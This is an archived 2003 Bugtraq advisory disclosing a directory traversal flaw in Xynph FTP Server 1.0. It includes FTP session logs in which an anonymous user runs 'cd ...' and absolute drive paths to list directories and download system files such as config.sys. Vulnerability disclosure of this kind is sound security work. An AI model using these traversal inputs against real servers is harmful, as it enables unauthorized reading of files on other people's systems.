Vulnerabilties in Xynph FTP Server 1.0
Date: Sat, 11 Jan 2003 22:52:32 +0800
From: "Zero-X www.lobnan.de Team" <zero-x@linuxmail.org>
To: bugtraq@securityfocus.com
Subject: Vulnerabilties in Xynph FTP Server 1.0
Vulnerabilties in Xynph FTP Server 1.0
Xynph FTP Server allows Directory Traversal
Example:
#######################################################
Verbindung mit zero-x.
220 Herzlich Willkommen!
<-Xynph FTP-Server->
Benutzer (zero-x:(none)): anonymous
331 Password required for anonymous.
Kennwort: billsucks
230 User anonymous logged in.
Ftp> pwd
257 "C:/Temp/" is current directory.
Ftp> cd ..
501 CWD failed. No permission
Ftp> cd ...
250 CWD command successful. "C:/Temp/.../" is current directory.
Ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 .
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 ..
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 Programme
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 command.com
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 Autoexec.bat
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 config.sys
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 Windows
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 Cygwin
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 Top-Secret
226 File sent ok
Ftp: 31337 Bytes empfangen in 0.00Sekunden 175000.00KB/Sek.
Ftp> get config.sys
200 Port command successful.
150 Opening data connection for config.sys.
226 File sent ok
Ftp: 1337 Bytes empfangen in 0.06Sekunden 2.92KB/Sek.
Ftp>
#######################################################
and you can read all drives.
Example:
#######################################################
Ftp> open zero-x
Verbindung mit zero-x.
220 Herzlich Willkommen!
<-Xynph FTP-Server->
Benutzer (zero-x:(none)): anonymous
331 Password required for anonymous.
Kennwort: billsucks
230 User anonymous logged in.
Ftp> get c:\config.sys
200 Port command successful.
150 Opening data connection for c:\config.sys.
226 File sent ok
Ftp: 1337 Bytes empfangen in 0.00Sekunden 175000.00KB/Sek.
Ftp> dir a:\
200 Port command successful.
150 Opening data connection for directory list.
-rw-rw-rw- 1 ftp ftp 305113 Dec 15 2002 1.jpg
-rw-rw-rw- 1 ftp ftp 313497 Dec 15 2002 4.jpg
-rw-rw-rw- 1 ftp ftp 326046 Dec 15 2002 2.jpg
-rw-rw-rw- 1 ftp ftp 357910 Dec 15 2002 3.jpg
226 File sent ok
Ftp: 31337 Bytes empfangen in 0.00Sekunden 244000.00KB/Sek.
Ftp>
#######################################################
~~ Zero X, member of www.lobnan.de ~~
Greets to:
www.lobnan.de (my Team)
www.he-crew.de
www.es-crew.de
www.bhc-security.de
www.dcw-group.net
--
______________________________________________
http://www.linuxmail.org/
Now with POP3/IMAP access for only US$19.95/yr
Powered by Outblaze
